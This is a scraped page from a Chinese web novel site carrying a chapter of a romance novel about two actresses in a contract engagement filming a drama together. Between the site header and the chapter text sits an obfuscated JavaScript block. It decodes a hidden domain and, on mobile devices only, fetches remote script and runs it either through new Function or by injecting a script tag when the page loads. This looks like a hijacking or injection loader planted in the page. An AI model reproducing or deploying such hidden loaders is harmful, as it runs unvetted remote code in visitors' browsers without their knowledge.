98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuamJzZGprYmNzY2QuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(47(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

第三条?孟璟想了想,唔,必要的时候秀恩爱?未婚妻刚哭过,眼圈儿还泛着红,搭配这副语重心长的口气忽然忍俊不禁,噗地一声笑出来,抬手揉上了未婚妻的头顶,傻。

宋若轻微不满,别这样,没大没小。

啧啧,上次在片场我就想说了,我比你大,哪里来的没大没小?除非你承认是我老婆,那就老婆最大承认吗老婆?

宋若不承认。

孟璟心想,不承认也没用。抬手在她头顶再揉了揉,眼睛弯成了月牙。

第58章

宋若上辈子演的戏多半是专情山茶花那一类的清纯女配,没能拿到国民媳妇与婆婆正面对峙的婆媳剧本,因而无论是实际生活还是演戏,都缺乏这方面的经验。孟璟的妈要来,宋若感觉以自己的定位,不太好拿捏分寸,难免有些如临大敌的感觉。

然而思来想去,别说苏女士天高皇帝远,就算真有人想搞定她,那也是孟璟真正的老婆要做的事。她只不过是孟璟的契约未婚妻,如今答应见面只是面子情儿,为了不丢孟爷爷和孟璟的脸,自己只要做到无功无过就可以了。这样一想,又轻松起来。她这心理建设刚做好,没想到这天晚上,苏女士又变卦了,说旅途劳累,要休息一天两天,想见面时再通知。

孟璟很无语。这电话来她开扩音接的,宋若也在旁边,孟璟朝未婚妻双手合十,做出个请原谅的姿势。

宋若却很淡定,心想也许是想搞什么突击检查。

两个人次日安心工作。

景知安在两个人的小巢,每天只喝一罐牛奶,那是她的计时方式,喝完奶把玻璃瓶洗干净晾在窗台上,排成寂寞而笔直的一条直线。空瓶的数量从一增加到十时,她依旧没有等来郑遂心的只言片语。第十天,她犹如行尸走肉般地收拾东西,准备按照原本的计划离开,去海外求学。郑遂心本来就是个意外,像是与她生命主乐章完全不搭调的一段插曲,虽然绚烂,却也暴虐,灵与肉都留下烙印。

她回到学校拿了几本书,最后一次回来,拿钥匙开门时手不稳,钥匙好几次掉在地上,她捡起来,看着钥匙环上套的戒指出神,那是郑遂心送她的。她怔怔地站在门口,手心摊着那串钥匙。隔壁的房东太太开门出来,顶着一头紫色卷发器,问她最近怎么不让她妹妹回家。景知安问什么妹妹?房东太太咧开大红唇笑了,一口软糯的吴侬软语跟你住一块那个不是你妹妹?我这几天,次次打麻将回来,看见她大晚上的不睡觉,杵在对面,罚站啊?好吓人的呀。

景知安这天晚上熄了灯,人却没睡,她拉开窗帘一角往下看,她看到了街对面矮树丛里挺拔的人影,她快步冲了出去,郑遂心发现了她,开始头也不回地撤退。两个人在深夜的街道追逐,天空配合地下起淅淅沥沥的小雨。

雨越下越大,郑遂心本来跑得极快,后面的脚步声不肯放松分毫,她忽然刹住了车,转身站定,景知安撞进了她怀里。

两个人在雨里抱成一团。

郑遂心左手指着身后的屋子,回去。别跟着我。

你凭什么。你凭什么。景知安苍白的脸上也分不清是汗水还是泪水,亦或是雨水。

郑遂心单手托着她的脸,眼眶也红得像充了血。

都是一条过。

倪俊咂咂嘴,意犹未尽地和副导演说我爱人写这种狗血戏真是入木三分。

副导演捧着茶杯呲溜喝了一口茶,不予置评。

倒是李滔滔更加忠心不二,咳嗽了一声,轻声提醒导演。

倪俊福至心灵,看着前方,目光悠远,谁的青春没有狗血过呢,青春的本质就是狗血与热血,我爱人真厉害啊,把握到位。

他话音刚落,陈轩的声音就凉凉地响起来,是么。

倪俊回过头,满脸的讶异哟,怎么来了?不是让你先睡下么?

陈轩哼了一声,走到很远的一把椅子上坐下,低着头玩起了手机。

休息室里,两个人坐在长凳上。孟璟难过得说不出话来。回去要扣倪羽晴奖金,这推荐的什么本子啊,风吹日晒还带浇水的,她当栽培栽培真的就是养盆栽啊?看把她老婆摧残成什么样儿了!又是拿暖宝宝,又是拿毯子给她捂着。先给她裹好,自己再从后边裹着未婚妻,声称要给她暖暖。

宋若觉得难为情,正要让她收敛些,门上笃笃笃三声,孟璟抢先问是谁。

倪俊的声音我。

孟璟把未婚妻搂得更紧,两条腿还从后面合抱住她的腰,再说导演请进。

宋若

倪俊推门进来,对于两个人的亲昵就当睁眼瞎,清了清嗓子,坐在对面。

辛苦了,暂时还不能收工,稍后的床戏我先过来讲一下。其实是被男朋友甩了脸子在外边待不下去的中年男子如是说道。

两个人都怔了一下。接着两人的表情发生了戏剧性的对比,孟璟眼睛里蹦出小星星来,点头呜哇,船戏!我喜欢船戏!宋若则面无表情睨了她一眼,最开始她和陈轩沟通,那时还不知道搭档的另外一个女孩子是谁,她就和他确认过,这部戏尺度并不大,最露骨的就是在白家周年会上的那个强吻,后续即使有船,也是云遮雾绕的。孟璟就是口头上犯浑而已。

倪俊点了点头,刚要说话,孟璟的手机来了电话,她朝导演投去歉意的微笑,率先接起来,喊了一声妈。

宋若可算重获了自由,她立刻站起来。孟璟接了,说了两句,捂着听筒,对未婚妻挑了挑眉,语气恢复了正经若若,苏女士说请吃晚饭,咱们过去么?

宋若抿着嘴,指指坐在一旁的倪俊。

孟璟便又问导演,咱们今天能不能提前收个工?

倪俊看了眼手表,站起来,成,接连赶了一个月的进度,都很累了,今天就到这里吧。其实他也得赶紧归家想办法哄对象。

苏女士订的西餐厅距离拍摄地点很有点距离。苏小健开了半小时车才到。路上孟璟发现未婚妻小身板挺得笔直,两手蜷握成拳头放在膝上,不由得微笑了老婆。

宋若转脸看她别叫我那个。

孟璟勾唇人家说,丑媳妇见公婆,那自然是紧张的,你这么漂亮可爱大方,我妈不紧张就是好的了,你怕啥?

宋若转过脸,工作开始前,例行紧张。

工作?孟璟反问了句,脸上的笑容淡却,嗤了一声,是哦,工作。

后半程,车里没人说话。

三十九岁的苏蓁蓁,穿一件杏黄色大衣,内衬的毛衣是米白色的,头发做了烫染,带一点点淡棕的金色,很契合她的气质,她这幅形容走在大街上,谁也不会认为,她有个孟璟这么大的女儿。反而她身边坐的那个少爷打扮的小孩子,才像是正宗的苏蓁蓁出品。

那小孩四五岁模样,穿着半新不旧的休闲装搭马甲,从质地看,一身行头价值不菲。他是苏蓁蓁再婚后生下的。个性与孟璟不同,很安静。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间